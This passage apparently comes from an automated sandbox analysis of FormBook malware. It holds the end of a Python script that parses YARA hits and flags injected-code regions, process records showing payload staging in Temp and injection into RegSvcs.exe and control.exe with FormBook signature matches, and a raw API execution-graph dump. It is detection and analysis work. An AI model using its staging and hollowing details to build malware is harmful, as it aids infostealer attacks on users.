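• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000021.00000002.1954501729.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000003.1994918677.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
"""

if __name__ == "__main__":
    hits = parse_yara_lines(SAMPLE_REPORT_LINES)
    for region, rules in rules_per_region(hits).items():
        print(f"target {region.target_id:>2} {region.process}")
        print(f"   0x{region.base:08X} {region.protect_name} {region.mem_type_name} rules={sorted(rules)}")
    for r in injected_code_regions(hits):
        print(f"INJECTED-CODE CANDIDATE: target {r.target_id} {r.process} @ 0x{r.base:X}")
```

Run against the whole report, the script separates the two kinds of hit: the stage-3 dumps in `RegSvcs.exe` and `oxhvi.msc.exe` are `PAGE_READWRITE` private memory (decrypted payload and configuration in the heap range), while both `cmmon32.exe` targets show `PAGE_EXECUTE_READWRITE` mapped memory, which is where the hollowed FormBook image should be carved from for static analysis and C2 extraction.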

                                                                                                                                                    Target ID:34
                                                                                                                                                    Start time:09:57:59
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE" C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC
                                                                                                                                                    Imagebase:0x290000
                                                                                                                                                    File size:947'288 bytes
                                                                                                                                                    MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000003.1994918677.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000022.00000003.1994918677.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000022.00000003.1994918677.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000003.1994918677.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000003.1994918677.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000003.1994440354.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000022.00000003.1994440354.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000022.00000003.1994440354.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000003.1994440354.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000003.1994440354.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000003.1993986799.00000000016C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000022.00000003.1993986799.00000000016C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000022.00000003.1993986799.00000000016C6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000003.1993986799.00000000016C6000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000003.1993986799.00000000016C6000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000003.1995504017.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000022.00000003.1995504017.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000022.00000003.1995504017.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000003.1995504017.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000003.1995504017.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000003.1995901696.0000000004154000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000022.00000003.1995901696.0000000004154000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000022.00000003.1995901696.0000000004154000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000003.1995901696.0000000004154000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000003.1995901696.0000000004154000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000003.1994684726.000000000170D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000022.00000003.1994684726.000000000170D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000022.00000003.1994684726.000000000170D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000003.1994684726.000000000170D000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000003.1994684726.000000000170D000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000003.1995504017.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000022.00000003.1995504017.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000022.00000003.1995504017.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000003.1995504017.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000003.1995504017.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000003.1996380159.000000000166A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000022.00000003.1996380159.000000000166A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000022.00000003.1996380159.000000000166A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000003.1996380159.000000000166A000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000003.1996380159.000000000166A000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000003.1995598062.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000022.00000003.1995598062.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000022.00000003.1995598062.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000003.1995598062.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000003.1995598062.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000003.1993881319.000000000166B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000022.00000003.1993881319.000000000166B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000022.00000003.1993881319.000000000166B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000003.1993881319.000000000166B000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000003.1993881319.000000000166B000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000003.1995831269.000000000163D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000022.00000003.1995831269.000000000163D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000022.00000003.1995831269.000000000163D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000003.1995831269.000000000163D000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000003.1995831269.000000000163D000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000003.1994589968.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000022.00000003.1994589968.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000022.00000003.1994589968.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000003.1994589968.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000003.1994589968.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000003.1993929850.0000000001699000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000022.00000003.1993929850.0000000001699000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000022.00000003.1993929850.0000000001699000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000003.1993929850.0000000001699000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000003.1993929850.0000000001699000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:35
                                                                                                                                                    Start time:09:58:05
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                                                                                                                                                    Imagebase:0xdc0000
                                                                                                                                                    File size:45'984 bytes
                                                                                                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:36
                                                                                                                                                    Start time:09:58:06
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                                                                                                                                                    Imagebase:0xdb0000
                                                                                                                                                    File size:45'984 bytes
                                                                                                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:37
                                                                                                                                                    Start time:09:58:06
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\control.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\SysWOW64\control.exe"
                                                                                                                                                    Imagebase:0x950000
                                                                                                                                                    File size:149'504 bytes
                                                                                                                                                    MD5 hash:EBC29AA32C57A54018089CFC9CACAFE8
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000025.00000002.2032446289.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000025.00000002.2032446289.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000025.00000002.2032446289.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000025.00000002.2032446289.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000025.00000002.2032446289.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:38
                                                                                                                                                    Start time:09:58:12
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\autofmt.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:"C:\Windows\SysWOW64\autofmt.exe"
                                                                                                                                                    Imagebase:0x380000
                                                                                                                                                    File size:822'272 bytes
                                                                                                                                                    MD5 hash:C72D80A976B7EB40534E8464957A979F
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:true


                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:9.6%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                      Signature Coverage:10.9%
                                                                                                                                                      Total number of Nodes:1919
                                                                                                                                                      Total number of Limit Nodes:29
28157 a40a5f 28152->28157 28153 a412e3 GetDlgItem 28158 a41302 28153->28158 28155 a40af5 28174 a4113a 28155->28174 28284 a40acb EndDialog 28155->28284 28156 a40b01 GetDlgItem 28162 a40b15 SendMessageW SendMessageW 28156->28162 28163 a40b38 SetFocus 28156->28163 28167 a40a68 GetMessageW 28157->28167 28157->28178 28523 a21e05 28158->28523 28160 a40994 28165 a409a4 28160->28165 28550 a21de7 28160->28550 28162->28163 28168 a40b6f 28163->28168 28169 a40b48 28163->28169 28164 a4130c 28526 a3f2ce GetClassNameW 28164->28526 28165->28178 28553 a219a9 26 API calls 28165->28553 28166 a40ae4 28182 a21a66 26 API calls 28166->28182 28173 a40a7f IsDialogMessageW 28167->28173 28167->28178 28575 a27673 28168->28575 28175 a34318 53 API calls 28169->28175 28173->28157 28179 a40a8e TranslateMessage DispatchMessageW 28173->28179 28180 a34318 53 API calls 28174->28180 28181 a40b52 28175->28181 28554 a45796 28178->28554 28179->28157 28186 a4114b SetDlgItemTextW 28180->28186 28557 a214a7 28181->28557 28182->28178 28191 a41160 28186->28191 28190 a40b88 28196 a34318 53 API calls 28190->28196 28193 a34318 53 API calls 28191->28193 28197 a4117e 28193->28197 28194 a40b6a 28395 a21a66 28194->28395 28195 a41346 28200 a41377 28195->28200 28204 a34318 53 API calls 28195->28204 28199 a40b9f 28196->28199 28202 a214a7 28 API calls 28197->28202 28198 a41d4f 48 API calls 28198->28195 28580 a36a25 28199->28580 28205 a41d4f 48 API calls 28200->28205 28305 a41490 28200->28305 28207 a41187 28202->28207 28210 a41359 SetDlgItemTextW 28204->28210 28211 a4138d 28205->28211 28213 a411f5 28207->28213 28225 a214a7 28 API calls 28207->28225 28208 a41595 28220 a415a0 EnableWindow 28208->28220 28221 a415ad 28208->28221 28215 a34318 53 API calls 28210->28215 28233 a413ad 28211->28233 28258 a413ce 28211->28258 28212 a40be0 28219 a40c07 28212->28219 28584 a2ed0d 28212->28584 28218 a34318 53 API calls 28213->28218 28214 a43572 21 API calls 28222 a40bbb 28214->28222 28216 a4136d SetDlgItemTextW 28215->28216 28216->28200 
28224 a411ff 28218->28224 28399 a2eaf3 28219->28399 28220->28221 28228 a415c8 28221->28228 28614 a21cc4 GetDlgItem KiUserCallbackDispatcher 28221->28614 28223 a21a66 26 API calls 28222->28223 28223->28194 28234 a214a7 28 API calls 28224->28234 28235 a411a6 28225->28235 28226 a4147c 28237 a41d4f 48 API calls 28226->28237 28232 a415f0 28228->28232 28249 a415e8 SendMessageW 28228->28249 28231 a41560 28613 a3e265 34 API calls __EH_prolog3_GS 28231->28613 28232->28166 28250 a34318 53 API calls 28232->28250 28611 a3e265 34 API calls __EH_prolog3_GS 28233->28611 28241 a4120b 28234->28241 28244 a34318 53 API calls 28235->28244 28237->28305 28238 a40c2b 28409 a32226 28238->28409 28239 a40c20 GetLastError 28239->28238 28254 a214a7 28 API calls 28241->28254 28242 a415bf 28615 a21cc4 GetDlgItem KiUserCallbackDispatcher 28242->28615 28273 a411b6 28244->28273 28249->28232 28256 a41609 SetDlgItemTextW 28250->28256 28251 a40c01 28587 a3fa79 25 API calls __ehhandler$___std_fs_get_file_id@8 28251->28587 28252 a40c40 28260 a40c5d 28252->28260 28261 a40c4c GetLastError 28252->28261 28253 a41587 28262 a21a66 26 API calls 28253->28262 28263 a41224 28254->28263 28255 a214a7 28 API calls 28255->28305 28256->28166 28258->28226 28259 a41d4f 48 API calls 28258->28259 28264 a41405 28259->28264 28265 a40cfd 28260->28265 28269 a40d0f 28260->28269 28270 a40c79 GetTickCount 28260->28270 28261->28260 28266 a41593 28262->28266 28276 a21a66 26 API calls 28263->28276 28264->28226 28268 a4140e DialogBoxParamW 28264->28268 28265->28269 28271 a41046 28265->28271 28266->28208 28267 a34318 53 API calls 28267->28305 28268->28226 28274 a4142c EndDialog 28268->28274 28272 a40f94 28269->28272 28588 a313f9 28269->28588 28412 a2325c 28270->28412 28444 a21e1f GetDlgItem ShowWindow 28271->28444 28272->28284 28609 a29733 28 API calls _wcslen 28272->28609 28279 a21a66 26 API calls 28273->28279 28274->28178 28280 a41448 28274->28280 28282 a41243 28276->28282 28287 a411e9 28279->28287 28280->28178 28612 a219a9 26 API 
calls 28280->28612 28289 a21a66 26 API calls 28282->28289 28283 a4105b 28445 a21e1f GetDlgItem ShowWindow 28283->28445 28284->28166 28286 a40d39 28599 a3505a 114 API calls 28286->28599 28293 a21a66 26 API calls 28287->28293 28296 a4124e 28289->28296 28291 a40fae 28304 a34318 53 API calls 28291->28304 28293->28213 28295 a40c9f 28299 a21a66 26 API calls 28295->28299 28300 a21a66 26 API calls 28296->28300 28297 a41064 28446 a34318 28297->28446 28298 a40d51 28309 a36a25 53 API calls 28298->28309 28302 a40cab 28299->28302 28300->28166 28422 a2de9a 28302->28422 28307 a40fd4 28304->28307 28305->28208 28305->28231 28305->28255 28305->28267 28308 a21a66 26 API calls 28305->28308 28314 a21a66 26 API calls 28307->28314 28308->28305 28323 a40d80 GetCommandLineW 28309->28323 28310 a41082 SetDlgItemTextW GetDlgItem 28312 a410b7 28310->28312 28313 a4109f GetWindowLongW SetWindowLongW 28310->28313 28451 a41d4f 28312->28451 28313->28312 28317 a40fea 28314->28317 28321 a21a66 26 API calls 28317->28321 28318 a40cd5 GetLastError 28319 a40ce0 28318->28319 28435 a2ddc7 28319->28435 28326 a40ff6 28321->28326 28336 a40e05 _wcslen 28323->28336 28325 a41d4f 48 API calls 28328 a410ce 28325->28328 28335 a34318 53 API calls 28326->28335 28481 a43c78 28328->28481 28330 a21a66 26 API calls 28330->28265 28333 a40e23 28601 a40405 5 API calls 2 library calls 28333->28601 28334 a41d4f 48 API calls 28346 a410ef 28334->28346 28338 a4100c 28335->28338 28600 a40405 5 API calls 2 library calls 28336->28600 28341 a214a7 28 API calls 28338->28341 28339 a40e2f 28602 a40405 5 API calls 2 library calls 28339->28602 28340 a41110 28610 a21cc4 GetDlgItem KiUserCallbackDispatcher 28340->28610 28344 a41015 28341->28344 28350 a21a66 26 API calls 28344->28350 28345 a40e3b 28603 a35109 114 API calls 28345->28603 28346->28340 28348 a41d4f 48 API calls 28346->28348 28348->28340 28349 a40e4e 28604 a43e53 28 API calls __EH_prolog3 28349->28604 28352 a41031 28350->28352 28356 a21a66 26 API calls 28352->28356 28353 a40e6b 
CreateFileMappingW 28354 a40ed5 ShellExecuteExW 28353->28354 28355 a40e9d MapViewOfFile 28353->28355 28358 a40ef3 28354->28358 28357 a40ed2 __InternalCxxFrameHandler 28355->28357 28356->28284 28357->28354 28359 a40f00 WaitForInputIdle 28358->28359 28360 a40f3d 28358->28360 28361 a40f1e 28359->28361 28363 a40f60 UnmapViewOfFile CloseHandle 28360->28363 28364 a40f73 28360->28364 28361->28360 28362 a40f23 Sleep 28361->28362 28362->28360 28362->28361 28363->28364 28605 a22e8b 28364->28605 28367 a21a66 26 API calls 28368 a40f83 28367->28368 28369 a21a66 26 API calls 28368->28369 28370 a40f8e 28369->28370 28370->28272 28372 a21ea6 28371->28372 28373 a21e4d 28371->28373 28617 a33e83 GetWindowLongW SetWindowLongW 28372->28617 28375 a21eb3 28373->28375 28616 a33eaa 64 API calls 3 library calls 28373->28616 28375->28129 28375->28130 28375->28178 28377 a21e6f 28377->28375 28378 a21e82 GetDlgItem 28377->28378 28378->28375 28379 a21e92 28378->28379 28379->28375 28380 a21e98 SetWindowTextW 28379->28380 28380->28375 28618 a457d8 28381->28618 28383 a21cee GetDlgItem 28384 a21d0b 28383->28384 28385 a21d1d 28383->28385 28386 a214a7 28 API calls 28384->28386 28619 a21d64 28385->28619 28388 a21d18 28386->28388 28389 a21d4d 28388->28389 28390 a21a66 26 API calls 28388->28390 28391 a21d5a 28389->28391 28392 a21a66 26 API calls 28389->28392 28390->28389 28630 a45787 28391->28630 28392->28391 28396 a21a80 28395->28396 28397 a21a71 28395->28397 28396->28212 28583 a43d64 26 API calls __EH_prolog3_GS 28396->28583 28398 a212a7 26 API calls 28397->28398 28398->28396 28406 a2eaff __EH_prolog3_GS 28399->28406 28400 a45787 5 API calls 28401 a2ebb6 28400->28401 28401->28238 28401->28239 28402 a2eb84 28403 a2efef 54 API calls 28402->28403 28405 a2eb09 28402->28405 28403->28405 28405->28400 28406->28402 28406->28405 28408 a21a66 26 API calls 28406->28408 28648 a2769f 28406->28648 28655 a2efef 28406->28655 28408->28406 28410 a32232 SetCurrentDirectoryW 28409->28410 28411 a32230 28409->28411 
28410->28252 28411->28410 28413 a23280 28412->28413 28811 a22f0f 28413->28811 28416 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 28417 a2329d 28416->28417 28418 a22f45 28417->28418 28419 a22f55 _wcslen 28418->28419 28815 a25962 28419->28815 28421 a22f63 28421->28295 28423 a2dea6 __EH_prolog3_GS 28422->28423 28424 a2def4 28423->28424 28425 a2df09 CreateFileW 28423->28425 28426 a2df9e 28424->28426 28427 a3169a 47 API calls 28424->28427 28425->28424 28429 a45787 5 API calls 28426->28429 28428 a2df49 28427->28428 28430 a2df6e 28428->28430 28432 a2df56 28428->28432 28433 a2df59 CreateFileW 28428->28433 28431 a2dfdf 28429->28431 28430->28426 28824 a219a9 26 API calls 28430->28824 28431->28318 28431->28319 28432->28433 28433->28430 28436 a2ddf8 28435->28436 28443 a2de09 28435->28443 28438 a2de04 28436->28438 28439 a2de0b 28436->28439 28436->28443 28437 a21a66 26 API calls 28440 a2de18 28437->28440 28825 a2dfe2 28438->28825 28830 a2de50 28439->28830 28440->28330 28443->28437 28444->28283 28445->28297 28447 a34328 28446->28447 28851 a34349 28447->28851 28450 a21e1f GetDlgItem ShowWindow 28450->28310 28467 a41d5e __EH_prolog3_GS 28451->28467 28453 a4349a 28454 a21a66 26 API calls 28453->28454 28455 a434a5 28454->28455 28456 a45787 5 API calls 28455->28456 28457 a410c5 28456->28457 28457->28325 28458 a2769f 45 API calls 28458->28467 28459 a225a4 26 API calls 28459->28467 28461 a214a7 28 API calls 28461->28467 28462 a3645a 28 API calls 28462->28467 28465 a434ad 28883 a258cb 45 API calls 28465->28883 28467->28453 28467->28458 28467->28459 28467->28461 28467->28462 28467->28465 28468 a21a66 26 API calls 28467->28468 28878 a362cd 30 API calls 2 library calls 28467->28878 28879 a3f5b2 28 API calls 28467->28879 28880 a2adaa CompareStringW 28467->28880 28881 a444c0 26 API calls 28467->28881 28882 a4030a 28 API calls 28467->28882 28468->28467 28482 a43c87 __EH_prolog3_catch_GS _wcslen 28481->28482 28884 a36a89 28482->28884 28484 a43cba 28888 a27903 28484->28888 28493 a45796 
